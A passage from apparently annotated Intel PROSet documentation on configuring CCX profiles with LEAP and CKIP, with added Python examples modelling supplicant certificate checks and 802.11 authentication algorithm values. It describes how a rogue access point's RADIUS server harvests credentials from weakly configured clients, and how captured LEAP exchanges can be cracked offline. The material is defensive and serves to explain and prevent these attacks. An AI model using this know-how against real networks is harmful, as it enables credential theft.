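    boundary, so radius1.corp.example matches corp.example but corp.example.evil.net
    does not). An empty server name performs no check at all."""
    if not server_name:
        return True
    cert_name, server_name = cert_name.lower(), server_name.lower()
    if match_exactly:
        return cert_name == server_name
    return cert_name == server_name or cert_name.endswith("." + server_name)


def accept_server(chain: List[Cert], certificate_issuer: Optional[str], allow_intermediates: bool,
                  server_name: str, match_exactly: bool) -> bool:
    """Decision the supplicant makes before sending any credential into the tunnel."""
    return (issuer_policy_ok(chain, certificate_issuer, allow_intermediates)
            and server_name_ok(chain[0].subject, server_name, match_exactly))


# Constructed chains: the real RADIUS server, the same server behind an issuing CA,
# and a rogue AP's server holding a perfectly valid certificate from a public CA.
DIRECT = [Cert("radius1.corp.example", "Corp Root CA")]
VIA_INTERMEDIATE = [Cert("radius1.corp.example", "Corp Issuing CA"),
                    Cert("Corp Issuing CA", "Corp Root CA")]
ROGUE = [Cert("radius.attacker.example", "Some Public CA")]

if __name__ == "__main__":
    weak = accept_server(ROGUE, None, True, "", True)                          # True
    strict = accept_server(ROGUE, "Corp Root CA", True, "corp.example", False)   # False
    print(weak, strict)
```

The weak line is the configuration to avoid: Any Trusted CA with no server name accepts the rogue chain, and a client that then proceeds with an inner password protocol hands its credentials to the attacker's RADIUS server. Naming the CA or the server (or both) is what makes the tunnel worth having.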

Setting up the Client for CCX using CKIP encryption and LEAP authentication

Configuring LEAP using Intel(R) PROSet
Note: A LEAP profile can only be configured using Intel(R) PROSet.

An Intel(R) PROSet CCX (v1.0) profile must be configured to connect to a specific ESS or Wireless LAN network. The profile settings include LEAP, CKIP and Rogue AP detection settings. LEAP authenticates the user with a challenge/response on the password that is not protected by a TLS tunnel, so a captured exchange can be attacked offline by password guessing; enforce strong passwords on LEAP networks, or prefer PEAP or TTLS where the access points support them.

To configure a profile for CCX security settings:

  1. From the General page, click the Networks tab.
  2. Click the Add button.
  3. Enter the profile and network (SSID) name.
  4. Select Infrastructure for the operating mode.
  5. Click the Enable Cisco Compatible Extensions check box to enable CCX security. If you have checked the Cisco's "Mixed-Cell" box in the Advanced Setting, this option must also be checked. Note: The Network authentication and the Data Encryption now include the CCX security options: Open, Shared for 802.11 Authentication and none, WEP, CKIP for Data encryption.
  6. Click Next.
  7. Select Open in the Network Authentication options.
  8. Select CKIP as the Data encryption.
  9. Click the 802.1x Enabled check box to enable the 802.1x security option.
  10. Select LEAP 802.1x Authentication Type.
  11. Click Configure to open the LEAP Settings dialog.
  12. Select one of the following options: Use Windows Logon, or enter the user name and password for your LEAP account.
Note: If the 'Use Windows Logon' feature is grayed-out (not accessible), the Single Sign On feature has not been installed. To install it, refer to Installing or Uninstalling the Single Sign On Feature.
  13. Click Close to save the settings and close the LEAP Settings dialog.
  14. Click Next. The Advanced page displays.
  15. Common Profiles and Persistent Connect: If required, to enable the Common profile feature select This profile can be used by all users (Common). To enable the Persistent Connect feature select This profile will be used when no user is logged on (Persistent). These features are installed during the software installation process. If these features are selected you must also enable Switch to common and persistent profile management in the Advanced Settings.
  16. If you selected the Enable Cisco Compatible Extensions check box in the General Settings page to enable CCX security, ensure that the Cisco "Enable Cisco Mixed Cell" check box is selected.
  17. Click Finish to save the profile settings.
  18. Select the new profile at the bottom of the Profiles List. Use the up and down arrows to position the priority of the new profile in the priority list.
  19. Click Connect to connect to the selected wireless network.
  20. Enter your LEAP credentials. Check the Save User Credentials check box to save the credentials for future use with this 802.1x profile.
  21. Click OK to close Intel(R) PROSet.

CCX Access Point and Client Configurations

The access point provides settings to select different authentication types depending on the WLAN environment. The client sends an Authentication Algorithm field in the 802.11 authentication handshake that takes place between the client and the AP during connection establishment. The Authentication Algorithm values recognized by a CCX-enabled AP differ by authentication type: "Network-EAP", which denotes LEAP, has the value 0x80, while "Open", the 802.11 Open System authentication, and "Required EAP", which requires an EAP exchange after association, both use the value 0x0.

Network-EAP only

AP: For CCX-enabled networks using LEAP authentication only, the authentication type is set with the "Network-EAP" check box selected and the "Open" and "Required EAP" boxes cleared. The AP is then configured to allow LEAP clients ONLY to authenticate and connect. In this case, the AP expects the 802.11 authentication algorithm to be set to 0x80 (LEAP), and rejects clients that attempt authentication with an Authentication Algorithm value of 0x0.

Client: In this case the client needs to send out an authentication algorithm value of 0x80 else the 802.11 authentication handshake would fail. During boot, when the Wireless LAN driver is already loaded, but the Intel(R) PROSet supplicant is still unloaded, the client sends 802.11 authentication with an Authentication algorithm value of 0x0. Once the Intel(R) PROSet supplicant loads, and engages the LEAP profile, it sends 802.11 authentication with an Authentication algorithm value of 0x80.

Network-EAP, Open and Required EAP

AP: If the Network-EAP, Open and Required EAP boxes are all checked, the AP accepts both 802.11 authentication algorithm values, 0x0 and 0x80. However, once the client is associated and authenticated, the AP expects an EAP handshake to take place. If for any reason the EAP handshake does not take place promptly, the AP stops responding to the client for about 60 seconds.

Client: Here the client can send an Authentication Algorithm value of 0x80 or 0x0; both are acceptable and the 802.11 authentication handshake succeeds. During boot, when the Wireless LAN driver is loaded but the supplicant is not, the client sends 802.11 authentication with an Authentication Algorithm value of 0x0. This is sufficient to get authenticated, but the EAP or LEAP credentials must still be presented to the AP to establish a connection.

Open and Required EAP only

AP: In the case where the AP is configured with Network-EAP unchecked, but Open and Required EAP checked, the AP will reject any client attempting to 802.11 authenticate using an authentication algorithm value of 0x80. The AP would accept any client using an authentication algorithm value of 0x0, and expects EAP handshake to commence soon after. In this case, the client uses MD5, TLS, LEAP or any other appropriate EAP method suitable for the specific network configuration.

Client: The client in this case is required to send out an authentication algorithm value of 0x0. As mentioned before the sequence involves a repeat of the initial 802.11 authentication handshake. First, the Wireless LAN driver initiates authentication with a value of 0x0 and later the supplicant would repeat the process. The client sends an 802.11 authentication with Authentication algorithm value of 0x0 even after the supplicant loads and engages the LEAP profile.
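The Authentication Algorithm handling described above, as an added example written for this page (it is not Intel(R) PROSet or Cisco code): it encodes and parses the 802.11 Authentication frame body, models the three AP check box combinations and their status replies, and reproduces the driver-then-supplicant sequence from the text. The rule by which the client picks 0x80 or 0x0 is a simplification for the example (a real client learns the AP's policy from its responses rather than from its configuration); status code 13 is the 802.11 "unsupported authentication algorithm" value.

```python
from typing import Dict

# Authentication Algorithm Number values (802.11 plus Cisco's Network-EAP).
ALG_OPEN, ALG_SHARED_KEY, ALG_NETWORK_EAP = 0x0000, 0x0001, 0x0080
STATUS_SUCCESS, STATUS_UNSUPPORTED_ALG = 0, 13   # 802.11 status codes


def auth_frame_body(algorithm: int, seq: int = 1, status: int = STATUS_SUCCESS) -> bytes:
    """802.11 Authentication frame body: Algorithm(2) | Transaction Sequence(2) |
    Status Code(2), each little-endian (Shared Key adds a Challenge Text element)."""
    return algorithm.to_bytes(2, "little") + seq.to_bytes(2, "little") + status.to_bytes(2, "little")


def parse_auth_frame_body(body: bytes) -> Dict[str, int]:
    if len(body) < 6:
        raise ValueError("authentication frame body too short")
    return {
        "algorithm": int.from_bytes(body[0:2], "little"),
        "seq": int.from_bytes(body[2:4], "little"),
        "status": int.from_bytes(body[4:6], "little"),
    }


class CcxAccessPoint:
    """The three AP check boxes from the text. network_eap accepts 0x80 (LEAP);
    open_auth accepts 0x0; required_eap means an EAP exchange must follow 0x0."""

    def __init__(self, network_eap: bool, open_auth: bool, required_eap: bool):
        self.network_eap, self.open_auth, self.required_eap = network_eap, open_auth, required_eap

    def respond(self, request_body: bytes) -> bytes:
        """Sequence 2 reply: success, or status 13 when the algorithm is not enabled."""
        alg = parse_auth_frame_body(request_body)["algorithm"]
        accepted = (alg == ALG_NETWORK_EAP and self.network_eap) or (alg == ALG_OPEN and self.open_auth)
        return auth_frame_body(alg, seq=2, status=STATUS_SUCCESS if accepted else STATUS_UNSUPPORTED_ALG)

    def eap_expected_after(self, alg: int) -> bool:
        """Whether the AP will wait for an EAP handshake once 802.11 authentication succeeds."""
        return alg == ALG_NETWORK_EAP or self.required_eap


def attempt(ap: CcxAccessPoint, alg: int) -> int:
    """One 802.11 authentication round trip; returns the AP's status code."""
    return parse_auth_frame_body(ap.respond(auth_frame_body(alg)))["status"]


def leap_client_algorithm(ap: CcxAccessPoint, supplicant_loaded: bool) -> int:
    """What the text says the client sends: the driver alone uses 0x0; with the
    LEAP profile engaged the supplicant uses 0x80 unless the AP only offers
    Open + Required EAP, in which case it must stay at 0x0 (simplified rule)."""
    if not supplicant_loaded or not ap.network_eap:
        return ALG_OPEN
    return ALG_NETWORK_EAP


# The three configurations described above.
NETWORK_EAP_ONLY = CcxAccessPoint(network_eap=True, open_auth=False, required_eap=False)
ALL_THREE = CcxAccessPoint(network_eap=True, open_auth=True, required_eap=True)
OPEN_REQUIRED_EAP = CcxAccessPoint(network_eap=False, open_auth=True, required_eap=True)

if __name__ == "__main__":
    for name, ap in [("Network-EAP only", NETWORK_EAP_ONLY), ("all three", ALL_THREE),
                     ("Open + Required EAP", OPEN_REQUIRED_EAP)]:
        boot = attempt(ap, leap_client_algorithm(ap, supplicant_loaded=False))
        later = attempt(ap, leap_client_algorithm(ap, supplicant_loaded=True))
        print(f"{name}: driver-only status {boot}, supplicant status {later}")
```

The algorithm number only filters which clients an AP talks to; it is not itself authentication. On a Network-EAP-only AP the boot-time 0x0 attempt is refused with status 13 exactly as the text describes, and on any configuration with Required EAP the AP still waits for the EAP exchange after a successful 0x0 authentication.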

Rogue AP

A LEAP profile ensures that the client implements the Rogue AP feature as required by CCX: the client records access points it failed to authenticate with and reports them to the AP that does let it authenticate and connect. The supplicant also sets the Authentication Algorithm to 0x80. Some network configurations implement Open and Required EAP only, as described above; for that setup the client must use an Authentication Algorithm value of 0x0 rather than the 0x80 needed for Network-EAP only. A LEAP profile enables the client to support both Network-EAP only and Open and Required EAP only.

Note: Please refer to the Cisco Compatible Extensions version 2.0 document available at www.cisco.com for more details.

